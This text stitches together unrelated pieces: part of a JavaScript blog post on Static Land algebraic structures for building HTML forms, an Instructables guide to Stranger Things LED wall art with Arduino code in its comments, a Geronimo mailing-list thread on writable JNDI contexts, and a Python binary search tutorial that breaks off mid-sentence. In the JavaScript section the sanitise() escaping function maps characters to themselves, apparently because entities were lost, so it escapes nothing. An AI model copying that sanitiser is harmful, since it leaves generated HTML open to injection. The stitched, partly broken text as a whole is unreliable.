built-in methods. Even with unary() and curry() making things more verbose, it’s still not long. The unary() function is there as a guard. It makes sure that callback functions only see a single parameter. This can be handy when using a function like parseInt(). Functions that take an optional second (or third) parameter can cause problems. The built-in .map() passes three parameters to the callback function: - The value from the array; - The current index; and - the entire array itself. Now parseInt(), for example, will interpret the index as the radix (also known as base). That’s not usually what we want. So we use unary() to prevent confusion. Back to our example though. How do we use List? We’ll start by defining a few utility functions. For simplicity, these return strings. It wouldn’t be hard to change them to return, say, React components though. For now, we’ll leave them as strings. function sanitise(str) { const replacements = [ [/</g, '<'], [/"/g, '"'], [/'/g, '''], [/\\/g, '\'], ]; const reducer = (s, [from, to]) => s.replace(from, to); return List.reduce(reducer, String(str), replacements); } function text({id, label, dflt, value, name}) { return ` <div class="Field"> <label class="Field-label" for="${id}">${label}</label> <input type="text" name="${name}" value="${sanitise(value)}" id="${id}" /> </div>`; } function email({id, label, dflt, value, name}) { return ` <div class="Field"> <label class="Field-label" for="${id}">${label}</label> <input type="email" name="${name}" value="${sanitise( value, )}" id="${id}" /> </div>`; } function checkboxItem(value) { return ({label: lbl, value: val, name}) => `<li><input class="Checkbox-input" type="checkbox" name="${name}" checked="${ val === value ? 'checked' : '' }" value="${sanitise(val)}" /><label for="">${lbl}</label></li>`; } function checkbox({id, label, type, options, value, name}) { return ` <fieldset id="${id}" class="Field Field-checkboxes"> <legend class="Field-label Field-label--checkboxes">${label}</legend> <ul class="CheckboxList"> ${List.map(checkboxItem(value), options).join('')} </ul> </fieldset>`; } function textarea({id, label, value, dflt, name}) { return ` <div class="Field"> <label class="Field-label" for="${id}">${label}</label> <textarea name="${name}" id="${id}">${sanitise(value)}</textarea> </div>`; } There’s nothing particularly interesting going on here. A little destructuring; a little string interpolation. No big deal. We’ve already used List.map() and List.reduce(). Note how we casually call .join() straight after calling List.map() in checkbox(). That’s a native array method right there. No unwrapping. No proxy methods. Just a straight value. Neat, huh? Two minor bits of cleverness to note in these utility functions: - The destructured parameter names look a lot like the keys in our form structure data blob. (That is, our formSpecvariable). - The names of our HTML functions match up rather well with the values for typein our form structure. (That’s formSpecagain). These are deliberate choices. We’ll see how they help in a little bit. (If you haven’t figured it out already). Getting back to the data, we have two blobs: formSpec and formData. The first, formSpec, has almost everything we need. But it’s missing some data. We need those values from formData. And we need some way to smush those two data structures together. As we go, we also need to make sure the right values end up in the correct form fields. How do we know which form values go with which specification? By matching the id fields in each object. In other words, we want to match each entry in formData with an entry in formSpec. And then smush those two objects together. We should end up with a new array of smushed objects that have the pre-filled values we want. Let’s put that another way. For each item in formSpec, we want to check to see if there’s an item in formData with the same id. If so, then we want to merge those values together. It might look something like this: const mergeOnId = curry(function mergeOnId(xs, ys) { return List.map( x => Object.assign(x, ys.find(y => x.id === y.id)), xs, ); }); This function takes the first list, and runs through each item. For each item it looks for a corresponding item in the second list. If it finds one, it merges the two. If it doesn’t find one, it merges undefined, which returns the same object. It may not be the most efficient way of doing it, but it gets the job done. Something bothers me about this function though. It’s a little too specific. We’ve hard-coded the field we’re matching on, id. It might give us some more flexibility if we made that field a parameter. So let’s rewrite our function to do that: const mergeOn = curry(function mergeOn(key, xs, ys) { return List.map( x => Object.assign(x, ys.find(y => x[key] === y[key])), xs, ); }); We have a way to merge our big list of form data. Next, we want to turn that form data into HTML. We do that by creating a function that looks at a given entry and calls the appropriate utility function. It might look something like this: function toField(data) { const funcMap = {text, email, checkbox, textarea}; return funcMap[data.type](data); } So, we could (if we wanted to) run toField() with List.map() to get an array full of HTML strings. But we don’t really want an array, we want one big string of HTML. We want to go from lots of values in the list down to a single value. Sounds like a job for List.reduce().3 function formDataToHTML(formData) { return List.reduce( (html, fieldData) => html + '\n' + toField(fieldData), '', formData ); } And from there it’s not too difficult to compose everything together… // Pipe stolen from “JavaScript Allongé, the "Six" Edition,” // by Reg “raganwald” Braithwaite. // Pipe composes functions in reverse order. function pipe(...fns) { return value => fns.reduce((acc, fn) => fn(acc), value); } const wrapWith = curry(function wrapWith(tag, data) { return `<${tag}>${data}</${tag}>`; }); function processForm(formSpec, formValues) { return pipe( mergeOn('id', formSpec), formDataToHTML, wrapWith('form'), )(formValues); } You can see the whole thing working together in this code sandbox. We have a neat little implementation. But perhaps it’s somewhat… underwhelming. We haven’t used any List functions besides map() and reduce(). It doesn’t seem worth introducing List for two functions. And they’re built-ins anyway. But my goal here isn’t to show you the absolute best way to build an HTML form. Rather, it’s to show how working with Static Land might look in practice. To that end, let’s introduce Maybe as well. That way we can see two algebraic structures working together. Maybe There’s some problems with our code so far. First, notice that when we run our code, the comment area shows ‘undefined’. That’s less than ideal. One way to deal with this is to add some default values to our form specification. The new specification might look like so:', }, ], dflt: '', }, { id: 'comments', label: 'Comments', type: 'textarea', dflt: '', name: 'comments', }, ]; All we’ve done is add some default values using the key dflt.4 So, we’ll continue to merge the two data structures as before. But we need some way to merge the dflt values with the value values. That is, if there is no value then use dflt. Sounds like a job for Maybe. So, a simple Maybe implementation might look like this: const isNil = x => (x === null || x === void 0); const Maybe = { // of :: a -> Maybe a of: x => x, // map :: (a -> b) -> Maybe a -> Maybe b map: curry(function map(f, mx) { return isNil(mx) ? null : f(mx); }), // ap :: Maybe (a -> b) -> Maybe a -> Maybe b ap: curry(function ap(mf, mx) { return isNil(mf) ? null : Maybe.map(mf, mx); }), // chain :: (a -> Maybe b) -> Maybe a -> Maybe b chain: curry(function chain(f, mx) { return Maybe.map(f, mx); }), // orElse :: a -> Maybe a -> a orElse: curry(function orElse(dflt, mx) { return isNil(mx) ? dflt : mx; }), } It’s a little bit different if you’re used to the Fantasy Land way of doing things. Our .of() function is just identity. And chain() just calls map(). But it’s still a valid implementation of Maybe. It encapsulates all those isNil() checks for us. So how might we use it? Let’s start by setting those default values. We’ll create a new function for the purpose: function setDefault(formData) { return { ...formData, value: Maybe.orElse(formData.dflt, formData.value), }; } We can compose this function with toField() when we process each item. So our formDataToHTML() function becomes: function formDataToHTML(formData) { return List.reduce( (html, fieldData) => html + '\n' + toField(setDefault(fieldData)), '', formData ); } There’s a second problem with our code though. This time it’s in the toField() function. And it’s potentially more serious than printing ‘undefined’ in a text field. Let’s take a look at the code for toField() again: function toField(data) { const funcMap = {text, email, checkbox, textarea}; return funcMap[data.type](data); } What happens if our form specification changes and introduces a new type of field? It will try to call funcMap[data.type] as a function. But there is no function. We’ll get the dreaded “undefined is not a function” error. That’s never fun. Fortunately, Maybe can help us out. We have a function that may be there, or it may be undefined. From a static-land point of view, this is already a Maybe. So, we can use Maybe.ap() to apply the function to a value. function toField(data) { const funcMap = {text, email, checkbox, textarea}; return Maybe.ap(funcMap[data.type], data); } And suddenly, the problem just disappears. It’s like magic. Here’s what it looks like when we compose it together: // Pipe stolen from “JavaScript Allongé, the "Six" Edition,” // by Reg “raganwald” Braithwaite. // Pipe composes functions in reverse order. const pipe = (...fns) => (value) => fns.reduce((acc, fn) => fn(acc), value); const wrapWith = curry(function wrapWith(tag, data) { return `<${tag}>${data}</${tag}>`; }); function processForm(formSpec, formValues) { return pipe( mergeOn('id', formSpec), List.map(setDefault), formDataToHTML, wrapWith('form'), )(formValues); } See the whole thing working together in this Code Sandbox. Weighing up the pros and cons Now, you may find all this a little… dull; unimpressive; ho hum, even. In fact, I’m hoping you do. That’s kind of the point. Static Land algebraic structures aren’t any more complicated than Fantasy Land ones. They just come at the problem in a different way. They have a different set of design trade-offs. Those design trade-offs are worth thinking about. We lose some type safety implementing Maybe this way.5 We’re no longer forced to use something like .orElse() to extract a value. We might get a little lax if we’re not careful. But at the same time, you can see how nice this is. We can use algebraic structures without wrapping and unwrapping values all the time. To me, it feels more natural. That’s completely subjective, I know, but that doesn’t make it irrelevant. Another trade-off is that we lose the ability to use utility libraries like Ramda in the same way. With Fantasy Land, we can write a map() function that delegates to myObject['fantasy-land/map'](). And map() will then work with any object that has a fantasy-land/map method. In the examples above, however, we had to be explicit about which map() function we were calling. It was either List.map() or Maybe.map(). So, we’re doing some work that a compiler might otherwise do for us. Furthermore, writing out all those prefixes (i.e. List or Maybe) gets annoying. Finally, there’s something else to consider with regards to wrapping and unwrapping. Notice how we were able to use List with plain ol' JavaScript arrays. We didn’t have to call myList.__value.find() to make our merge function. It makes our code easier to integrate. We’re not using a custom-made class. It’s native JavaScript data types and functions. That’s it. But which one is better? So, you might be wondering: “Which one is better?” And you probably know what I’m going to say: “It depends”. Static land is a mixed bag. We gain some convenience and interoperability, but at a cost. We end up writing out a bunch of module prefixes. We swap one namespace work-around for another. So they come out roughly even. That said, in certain situations, Static Land really shines. For example, you may be working with React components or DOM elements. And asking the rest of your team to wrap them up in another layer may be too much. It’s not worth the effort to make them work with Fantasy Land. But Static Land lets you work with those data types directly. Yet still maintain the benefits of algebraic structures. For those situations, it’s lovely.6 But really, my main goal for this post was to raise some awareness for Static Land. Just to get it out there as an option. I don’t see many other people writing about it. But I think it’s cool and deserves more attention than it gets. So maybe take a look and see if it might come in handy for you. Or ducky–typed, as the case may be… ↩︎ That is, if we want to. We can use Either for lots of things. Not just errors and exceptions. They just happen to be a common use case. ↩︎ I’ve written a step–by–step guide on how to use Array methods. It tells you the exact array function to call in different circumstances. And it’s a free PDF download. Check it out at A Civilised Guide to JavaScript Array Methods ↩︎ Using dfltrather than defaultis deliberate. defaultis a reserved word in JavaScript. To use it as an object key, we‘d have to put quotes around it. And I’m too lazy for that. ↩︎ This may be much less of an issue if you're using something like Typescript or Flow. ↩︎ And in case you're wondering, yes, I do plan to write something about React and functional programming in future. ↩︎
https://jrsinclair.com/articles/2020/whats-more-fantastic-than-fantasy-land-static-land/
CC-MAIN-2021-31
refinedweb
4,261
69.48
Introduction: Stranger Things Interactive Wall Art hello everyone, here is a great beginner arduino + neopixel "art hack" - you can bring any art form into life with this very simple instructable. I decided to create the christmas light wall decoration from the netflix show "stranger things" it has an onboard usb rechargable battery, so you can hang it up anywhere and still be able to demonstrate your art.!! it also has an mini button to shuffle through pre-recorded spellings :) . materials needed; few feet of thin solid core wire involves using hot glue + soldering (learn) . let's make > please vote for this post on the LED contest Step 1: Design included zip file includes the 2D vector drawings. and how I alligned the lights on the board, to figure out exact drilling spots. i used adobe illustrator to design.. . i cut the parts using a local CNC machine. you can easily use hand tools to cut the parts, just be careful.. or even better search for a local makerspace, become a member and make something AWESOME. remember to sand everything nice and smooth :) . print the PDF file, which includes the picture to print and glue on the board. use US letter size paper and do not choose "fit to page" on print settings. Step 2: Place Lights we start assembly by hot gluing the neopixels to the frame Step 3: Start Wiring follow the diagram and take your time, especially if you are new to soldering. you can use hot glue to first lay down the wire and secure it into place. Step 4: Circuit here is the full circuit. you can recharge the battery like a cell phone. and then use the usb cable to power the arduino either from the battery or from any usb outlet. . remember all the 5V + positive wires from the lights come together as one into arduino 5V pin all the GND - negative wires from the lights come together as one into arduino GND pin data in for first led goes into D6 on arduino . capacitor - negative leg goes to arduino GND pin with the light wires capacitor + positive leg goes to arduino 5V pin with the light wires . resistor goes just before the first LED's Din pin button 1 leg goes to GND button opposite leg goes to D4 on arduino. hot glue the battery to a place where the usb cable can easily connect Step 5: Program here is the arduino code; feel free to comment below for help if you are new to arduino Step 6: Place the Print before gluing anything, place the print on the board to see if everything is aligned right. . if you hold it up to ambient light, you should see it come through the paper. . i used cardstock paper to make it more durable & spray glue to secure it down on the wooden board. Step 7: Lights On assemble rest of the frame to give it more of a picture frame look now go ahead turn it on & hang it up :) . hope you enjoyed it and that this instructable will spark your creativity please share, favorite + follow.!! Thank you Akin for this amazing instructable! I made a Stranger Things Casemod and used this on my project. You can see more here:: good stuff, thank you for sharing.!!: weird, uno is ok to use, same thing. did you install the neopixel library correctly.? also are you powering the lights correctly.? Merhaba, bir Türk ismi görünce yazmak istedim, başarılar dilerim :) Hi I am wanting to make this. But I want it bigger around 22x16 inches. Your source files cncparts.ai gave me an error "Could not find linked file "stranger things wall.png" " I was hoping to edit it possibly for bigger printing. How did you make it originally? I also noticed it was pixelated in areas which would look even worse when blown up. Any suggestions? yes the picture i used isn't big enough for such large prints;... search google "stranger things alphabet wall" maybe you can find a bigger image good luck Hi Akin (and others)! My LEDs came in, and I've been able to start testing. The C9 format is exactly what I wanted, and they are working great. They are 12V, so I did need to run additional power independantly (I may ask you some additional hardware questions later)! For the code, here's a quick clean up of what you provided. The "For" loop is useful if you want to set all LEDs to the same colour (or turn them all off). It isn't necessary for turning individual lights on and off. Hopefully you can make sense of what I've done, and re-do your code snippets in the instructable. In another week or so, I'll share the updated code I'm doing, so the lights will blink, and do patterns, and hopefully have a simplified way of entering messages. Thanks again. #include <Adafruit_NeoPixel.h> #define PIN 6 Adafruit_NeoPixel strip = Adafruit_NeoPixel(27, PIN, NEO_GRB + NEO_KHZ800); void setup() { strip.begin(); strip.show(); // Initialize all pixels to 'off' } void loop() { //main ardino loop - this keeps repeating // set all colours to christmas colors strip.setPixelColor(0, 105, 105, 105); //A - white strip.setPixelColor(1, 0, 0, 105); //B - blue strip.setPixelColor(2, 105, 0, 0); //C - red strip.setPixelColor(3, 0, 80, 105); //D - light blue strip.setPixelColor(4, 0, 0, 105); //E - blue strip.setPixelColor(5, 105, 105, 25); //F - yellow strip.setPixelColor(6, 105, 0, 0); //G - red strip.setPixelColor(7, 0, 0, 105); //H - blue strip.setPixelColor(8, 0, 0, 105); //I - blue strip.setPixelColor(9, 105, 0, 0); //J - red strip.setPixelColor(10, 0, 0, 105); //K - blue strip.setPixelColor(11, 105, 105, 105); //L - white strip.setPixelColor(12, 105, 105, 25); //M - yellow strip.setPixelColor(13, 105, 0, 0); //N - red strip.setPixelColor(14, 105, 0, 0); //O - red strip.setPixelColor(15, 0, 80, 105); //P - light blue strip.setPixelColor(16, 105, 0, 0); //Q - red strip.setPixelColor(17, 0, 80, 105); //R - light blue strip.setPixelColor(18, 105, 105, 105); //S - white strip.setPixelColor(19, 105, 105, 25); //T - yellow strip.setPixelColor(20, 0, 0, 105); //U - blue strip.setPixelColor(21, 105, 0, 0); //V - red strip.setPixelColor(22, 0, 0, 105); //W - blue strip.setPixelColor(23, 105, 105, 25); //X - yellow strip.setPixelColor(24, 105, 0, 0); //Y - red strip.setPixelColor(25, 105, 0, 0); //Z - red strip.setPixelColor(26, 255, 0, 255); //empty - none strip.show(); delay(1000); //turn all colours off for(int i=0;i<26;i++){ //loops through LED 'i' setting all to 0,0,0 (off) strip.setPixelColor(i, 0, 0, 0); } strip.show(); delay(1000); //turn on and off individual lights --- RIGHT --- strip.setPixelColor(17, 0, 80, 105); //R - light blue strip.show(); delay(600); strip.setPixelColor(17, 0, 0, 0); //R - off strip.setPixelColor(8, 0, 0, 105); //I - blue strip.show(); delay(600); strip.setPixelColor(8, 0, 0, 0); //I - off strip.setPixelColor(6, 105, 0, 0); //G - red strip.show(); delay(600); strip.setPixelColor(6, 0, 0, 0); //G - off strip.setPixelColor(7, 0, 0, 105); //H - blue strip.show(); delay(600); strip.setPixelColor(7, 0, 0, 0); //H - off strip.setPixelColor(19, 105, 105, 15); //T - yellow strip.show(); delay(600); strip.setPixelColor(19, 0, 0, 0); //T - off strip.show(); delay(1100); //turn on and off individual lights --- HERE --- strip.setPixelColor(7, 0, 0, 105); //H - blue strip.show(); delay(600); strip.setPixelColor(7, 0, 0, 0); //H - off strip.setPixelColor(4, 0, 0, 105); //E - blue strip.show(); delay(600); strip.setPixelColor(4, 0, 0, 0); //E - off strip.setPixelColor(17, 0, 80, 105); //R - light blue strip.show(); delay(600); strip.setPixelColor(17, 0, 0, 0); //R - off strip.setPixelColor(4, 0, 0, 105); //E - blue strip.show(); delay(600); strip.setPixelColor(4, 0, 0, 0); //E - off strip.show(); delay(2100); //turn on and off individual lights --- RUN --- strip.setPixelColor(17, 0, 80, 105); //R - light blue strip.show(); delay(600); strip.setPixelColor(17, 0, 0, 0); //R - off strip.setPixelColor(20, 0, 0, 105); //U - blue strip.show(); delay(600); strip.setPixelColor(20, 0, 0, 0); //U - off strip.setPixelColor(13, 105, 0, 0); //N - red strip.show(); delay(600); strip.setPixelColor(13, 0, 0, 0); //N - off strip.show(); delay(2100); } Here's a better version if you install the FastLED library: #include <FastLED.h> template<typename T, size_t N> constexpr size_t countof(const T(&)[N]) { return N; } CRGB leds[50]; // Christmas light colors CRGB colors[] = { //yellow 0xFFA500, //white 0xFFFFFF, //green 0x008000, //aqua 0x00FFFF, //red 0xFF0000, //blue 0x0000FF }; // An array to store which color is at which index is // used so that the color of each LED stays the same. // Values are generated in setup(). uint8_t index[countof(leds)]; void setup() { for (auto &color : colors) napplyGamma_video(color, 2.2); index[0] = random8(countof(colors)); for (size_t i = 1; i < countof(leds); i++) { index[i] = random8(countof(colors)-1); if (index[i] == index[i-1]) index[i] = countof(colors)-1; } FastLED.addLeds<WS2811, 6, RGB>(leds, countof(leds)); FastLED.setBrightness(255); // Fill and show LEDs for (size_t i = 0; i < countof(leds); i++) leds[i] = colors[index[i]]; FastLED.show(); // Message trigger delay(5000); //); } // Finally clear the array so that the LEDs don't // relight when we show our message FastLED.clear(); } void loop() { // Spaces are moved to before the message so that there's a pause // after the flicker. Could be replaced with a delay() in setup(). FastLED.clear(); write(" Message One"); write(" Message Two"); write(" Message Three"); // Fill and show LEDs for (size_t i = 0; i < countof(leds); i++) leds[i] = colors[index[i]]; FastLED.show(); // Message trigger delay(4000); //); } } //May not be needed. This accounts for LED pixels skipped or not used for the 2nd and 3rd rows int getIndex(char c) { c = toUpperCase(c); switch (c) { case 'A'...'H': return 50 - (c - 'A'); case 'I'...'P': return 30 + (c - 'I'); case 'Q': return 39; case 'R'...'Y': return 26 - (c - 'R'); case 'Z': return 17; default: // Should never happen, but is here to avoid compiler warnings return 0; } } void write(char c) { if (isAlpha(c)) { // Get index and convert to 0-based indexing int i = getIndex(c)-1; leds[i] = colors[index[i]]; FastLED.show(); delay(750); leds[i] = CRGB::Black; FastLED.show(); delay(250); } else if (isSpace(c)) { delay(1000); } } void write(const char *str) { while (*str) write(*str++); } thank you for sharing the code sorry for the late response, instructables didn't email me about this comment.. i normally reply back same day :( great stuff.!! thank you for sharing the code I really need to find the time to try this. So cool! please do, thank you for your interest..sorry for the late response, instructables didn't email me about this comment.. i normally reply back same day :( Hi Akin! Thanks for posting this! I had the same idea as you and am happy there are others posting code here as that's my next step. I used neopixels and a Circuit Playground from Adafruit. I'm also working on setting up a character array that will be read from, instead of a long line of code. Mine is going to be a Halloween costume so I am putting it on cardboard and wearing. You can also sew them into a shirt! I got some tiny dollhouse/scrapbooking Holiday lights. I will post some updates this weekend and share my code once I get it going. -Sam sorry for the late response, instructables didn't email me about this comment.. i normally reply back same day :( very good stuff, hope you got to rock it for halloween.!! Hey guys so I'm actually building this for an Art Project, and I really want to do this. However I'm completely new to coding and where to get them materials at. Anyone know a spot where I can find them without buying online since I have till Oct31 to present? sorry for the late response, instructables didn't email me about this comment.. how did it go, did you present.?! Also, this time of year places like Hobby Lobby or craft stores will have small plastic holiday lights that can be used for scrapbooking and wrapping gifts. That way you don't have to buy actual lights and can save some money. If you go to, you can see if there is a local store you can get them from. Microcenter in the US has neopixels, and various controllers you can use; if you live near one with a stock you don't have to wait for shipping. And for learning code, I would just use the code others have posted to get it working, and learn from how it works. Basic principle of coding for me is: Take an input and do stuff to get your required output. I'm still learning myself, but it helps to think of it that way to read code and figure out what is being done to the input. This is great project to learn from! I'm real close to finishing this off (I just need to paint the letters onto the board). I'll post some pictures once I do. A couple of changes I made: * I used foam board and a drill to cut the holes. While a CNCed board would have been better, this was much easier. * Costco had some christmas strings for $10 which I scrapped for parts. I used my soldering iron to cut the plastic bulbs in half and glued them to a piece of fabric I stretched over the foam board. * I cleaned up the code a little bit. You can modify it to host any number of phrases and you switch phrases by holding down a button between phrases: Thanks for your help with this project and I hope my notes can be of help to someone! Thanks for sharing the code, gremdel! I'm learning code and this is a good intro to switch/case. I wanted to make an array and have it read phrases from that, so glad you are doing that! I was thinking of making variables and have strip.setPixelColor(Xvariable, Xvariable), but sadly can't have a variable have two values such as 'uint32_t a = strip.n(0), strip.Color(255, 0, 255);'. I was thinking of doing 26 if/thens of reading from the array and "if a strip.setPixelColor(0, 255,0,0)" (bad syntax just for examples). Not sure if that will work but it would be good practice, even if it doesn't. Doesn't seem as efficient as what you are doing though. Why do you define the letters at the beginning? Wouldn't reading from an array of letters work too without defining them since ascii is supported in arduino? Or is defining necessary for switch/case? Thanks! great stuff lotus.!! > but sadly can't have a variable have two values such as 'uint32_t a = strip.n(0), strip.Color(255, 0, 255);' No, but one thing I considered was an array of color choices, where I would set it up like this: uint32_t colorChoices[] = {strip.Color(255,0,0), strip.Color(0,255,0), ...} Then I could just call colorChoices[LED_S] or whatever to get the color. I ended up using the function because it was easier to read. > Why do you define the letters at the beginning? That's a function of how I have things wired up in the back. I tried to keep wires as short as possible so instead of going from A to Z, I go from Z to R, I to Q, and H to A. So calling character - 'A' wouldn't work. For efficiency, if/then vs. switch really isn't much different (the compiler ends up with the same assembly code more or less) but I think switch is easier to read. Here's some pics. I also changed the code to match light colors, add some flickering lights, and get brighter sequence: I'm not 100% pleased with the lettering. The lettering in the show is creepier with dripping paint but since it's on fabric it didn't drip and I didn't want to make it worse by trying to force it. It's going into the window tonight! thank you very much for all your support on this post. both with comments and code. and WOW this looks great. just perfetc.. sorry for the late response, instructables didn't email me about this comment.. Hi Gremdel. I am having some issues I think its with the code, but it may well be the arduino. All the lights start flashing after I upload the data to arduino, it starts spelling something out then starts flashing again. the button does nothing noticeable. I have the button connected to D4 and ground. and the signal wire(? the second set of solder points on the lights) connected to D6and started with LED A. I ohm tested all of them and nothing is shorting. (+5v, Grnd, and data) any pointers would be appreciated. thanks in advance. sorry for the late response, instructables didn't email me about this comment.. the button sketch above is from another similar project :) please use one of the other sketches, starting with the main one to make sure everything works. i was hoping someone would fix the button code to work with this project Are you using the first or second example of code I posted? Either way, did you modify the #defines to match the order of the signal wire? #define PIN(2) and PIN_Switch (a3) yes. However the switch threw errors. (i'm not at the device to give you the exact code.) However switch would only take a 6 for the switch which i'm assuming is the issue now that i'm revisiting it. (i tried both scripts) If you post the code (pastie.org works well) and some pictures of how you wired it, I'm happy to help. Hope that URL works. pics (dont judge me lol): The PIN defines look correct to me. I think you do need to change all the LED defines (for example "#define LED_A (25)" ) to line up with the order of your signal wire. If it's like Akin's original wiring, it's LED_A to (0), LED_B to (1), and so on. I had trouble with the switch so I do have some debugging stuff in the code: Serial.print(digitalRead(PIN_SWITCH)); So if you listen on the serial port while it's running you'll get some debug info. I'm getting the debug info but nothing happens with the switch. I got it stuck on flicker a few times trying stuff with the code. still no luck. Also my take on the front. Pre letters, not sure how I want them yet. sorry for the late response, instructables didn't email me about this comment.. man great work :) nothing wrong with foam board, i use is all the time. that code looks great, thank you for sharing I'm having the hardest time getting the solder to stick when it does its super fragile and breaks off of the LEDs. Are there any tricks to getting it to be secure? I was completely new to soldering with this project. I bought the smallest tip I could find at Radio Shack, and the smallest diameter solder. I touched the tip to each LED and then the solder to form a very small puddle of solder. Then I came back with the wire, reheated the solder and quickly placed the wire down into it. Seemed to work for me. great news, this is a very hard project to learn soldering from. these are very tiny parts, happy to hear it worked out.!!... this is the way i did it (and looks like the way markc did it). minus the alligator clips. go slow, use hot glue (sparingly its a pain to remove) to hold the wires down if they keep popping out. i also used an exacto knife blade back to hold the wire down long enough after removal of the iron, to keep it from popping up. (instead of the hot glue. or use both) look at my posts earlier to see what not to do with hot glue. great advice, thank you.!! sorry for the late response, instructables didn't email me about this comment.. as mentioned below tinning the soldering points will definitely help alot, both on the lights and wires. also make sure that your lights and wires are secured while soldering. they CAN NOT MOVE as you try to solder. i don't know about your skill level, but these are very small parts to learn on :) Any help with debugging? I've finished wiring and uploaded the program. "A" comes on, then "B" starts flashing... and that's it. Here's a pic of my wiring. Got an ohm meter? check your contacts a positive to z positive, same with ground. then do the data contacts one at a time to check them for shorts. which code did you use? i used gremdels first post. other than the switch not working its easy to add phrases. also make sure the program uploads completely from the IDE yes the switch is from another project that does smtg similar. i figured someone would help out clear that a bit :) and good advice with the multimeter. most likely its a loose connection.. sorry for the late response, instructables didn't email me about this comment.. most likely the Data out wire from the 2nd LED (B) is loose, or not soldered good. it could be the power line as well after this LED. second most likely is the code, but i doubt you changed anything. can you check to see if in your code you have the right amout of LEDs input not just 2 . if these aren't the issue, your 2nd LED might be faulty (not very likely) but you may have burned it out while soldering. depending on your skill level, they are very small. hope you had it solved by now, let me know, Akin Can you control the wording with this setup? I'm wanting to make a graduation cap that will spell out "Engineer". I could use some tips. Thanks yes you can, i have actually added bunch of different spellings in the code. it's very simple stuff. my code above is much more basic. the code suggested below might be confusing for a beginner. good luck Yes, but use gremdls code its easy to follow. For changing the wording and adding phrases Hello Akin. Any help for a complete Noob with Arduino? I've downloaded loaded the file you provided which provides me with "button scroll" "goveg" "join makerspace" "right here run" and "strangerthings.ai" When I compile strangerthings.ai I receive a fatal error: Adafruit_NeoPixel.h: No such file or directory Is this a library that needs to be loaded first? Sorry for the request for hand-holding.
http://www.instructables.com/id/Stranger-Things-Interactive-Wall-Art/
CC-MAIN-2017-34
refinedweb
3,872
76.11
I agree with what Dain said. I also believe that as the spec says the J2EE component enviroment should not be writable and we need not provide any option for that either. It is not necessary. Apps can bind to other namespaces. On 4/26/06, Dain Sundstrom <dain@iq80.com> wrote: > > Are you planning on making the J2EE component enviroment (java:comp/ > env) writable? I can see making the global tree writable, but am > concerned about making the component environment itself writable. > The J2EE 1.4 spec page 64 states: > > The container must ensure that the application component instances > have only > read access to their environment variables. The container must throw the > javax.naming.OperationNotSupportedException from all the methods of the > javax.naming.Context interface that modify the environment naming > context > and its subcontexts > > I suppose we could add an optional flag for non-compliant > applications to allow them to modify their environment, but I think > the default for the component environment should be read-only. > > BTW, I am in favor of making everything else writable. > > -dain > > On Apr 26, 2006, at 6:32 AM, Manu George wrote: > > > Hi, Guillaume > > I guess if a writable context is implemented still the approach > > given above should work. As we will be using the ENCConfigBuilder > > only to populate the ENC during startup the interfaces can be used > > to refer to the gbeans representing the deployed artefacts. > > Whatever we will be writing to context from apps would be done > > after startup of server and lost at shutdown. So there would not > > be any problem due to geronimo using interfaces to get the GBean > > names as what we will be adding at runtime will not be gbeans and > > we will not use ENCConfigBuilder. Am I right? > > > > Now a new property for jndiname will also be required in the plans > > for the connectors. > > > > P.S.This property was actually present in the older versions of > > geronimo but was removed. I also remember david jencks mentioning > > in the mailing list that he had a working implementation of a > > context which he removed for some reason. > > > > Thanks > > Manu > > > > > > > > > > > >>> > > >>> > > >>> > > >>> > > > > > > > > > > > > > > > >
http://mail-archives.apache.org/mod_mbox/geronimo-dev/200604.mbox/%3C466797bd0604262314r8bce69fk2b3e8c4138221cb4@mail.gmail.com%3E
CC-MAIN-2016-50
refinedweb
351
63.7
Today, we will learn a very fast searching algorithm – the binary search algorithm in Python. We will see its logic, how to write it in Python and what makes it so fast. The Binary Search Algorithm There is one thing to note before starting, the algorithm requires that the given list should be sorted. This is because we can find if a number is after or before a certain another number in a list based on the list’s sorting. Recall how we find words in a dictionary or page numbers in a book. We simply go to a point in the sequence and check if what we need to find is after or before that point, we make guesses like this until we have found the item. Similarly, in Binary Search, we start by looking at the centre of the list. Either we will find the item there, in which case the algorithm is over, or we will know whether the item is after or before the middle item based on how the list is sorted. After this, we will simply ignore the half which is not supposed to have the item we need. And we repeat this process by going to the middle of the other half. Eventually, we will either find the item or there will be no more halves to eliminate, which will end the algorithm either successfully or unsuccessfully. Notice that we are dividing the list into two halves and then eliminating one half, because of this behaviour of the algorithm, it is aptly named Binary Search. Merriam-Webster Dictionary’s meaning of “Binary”: a division into two groups or classes that are considered diametrically opposite. Recommended read: Binary search tree algorithm in Python Theoretical Example of the Binary Search Algorithm Let us take an example to understand it better: Given List: 11, 23, 36, 47, 51, 66, 73, 83, 92 To find: 23 - The list has 9 items, so the center one must be in position 5, which is 51. - 51 is not equal to 23, but it is more than 23. So if 23 is there in the list, it has to be before 51. So we eliminate 51 and all items after it. - Remaining List: 11, 23, 36, 47 - Now we have 4 items in the list, and depending on how you calculate the center index, it will either tell us that 2 is the center position or 3 is the center position. - For simplicity, we will calculate the mean of the start and end positions to get the center. - Here, start = 1 and end = 4, so the mean is 2 (integer part of 2.5). - So, in position 2, we have 23, which is the item we needed to find. And the algorithm will end and give us the target’s position. Now let us see how the binary search algorithm is coded in Python. Binary Search in Python def binary_search(lst, target): start = 0 end = len(lst) - 1 while(start <= end): mid = (start + end) // 2 if(lst[mid] > target): end = mid - 1 elif(lst[mid] < target): start = mid + 1 else: return mid return None Let us go through the algorithm, - We create a function that takes two arguments, the first one is the list and the second one is the target that we need to find. - We declare two variables startand endthat point to the start (0) and end (length – 1) of the list respectively. - These two variables are responsible for eliminating items from the search because the algorithm won’t consider items outside this range. - The next loop will continue to find and eliminate items as long as the start is less than or equal to the end because the only way the start becomes greater than the end is if the item is not on the list. - Inside the loop, we find the integer value of the mean of startand end, and consider that as the middle item of the list. Now, if the middle item is more than the target, it means that the target can only be present before the middle item. So we set the end of the list as the index before the middle, this way, all indexes after mid, including mid, are eliminated from consideration. Similarly, if the middle item is less than the target, it means that the target can only be present after the middle item, and in order to eliminate the index mid and all indexes before mid, we set the start variable as the index after mid. If none of the above two cases is true, i.e. if the item at the middle is neither greater nor smaller than the target, then it must be the target. So we simply return the index of this middle item and end the algorithm. If the loop finishes, then that means that the target was not found, this means that the target was not in the list and the function simply returns None. Let us see the code perform and check its output. The Output We can see that 23 was present in the list numbers, so the function returned its index, which is 2, but 70 was not present in the list, and so the function returned None. What Makes Binary Search Fast? Consider a simple searching algorithm like linear search where we have to go through each item till we find what we are looking for. This means that for larger input sizes, the time it takes to find an item increases by as much amount as the input size increases. Quantifiably, its time complexity is O(n). Time 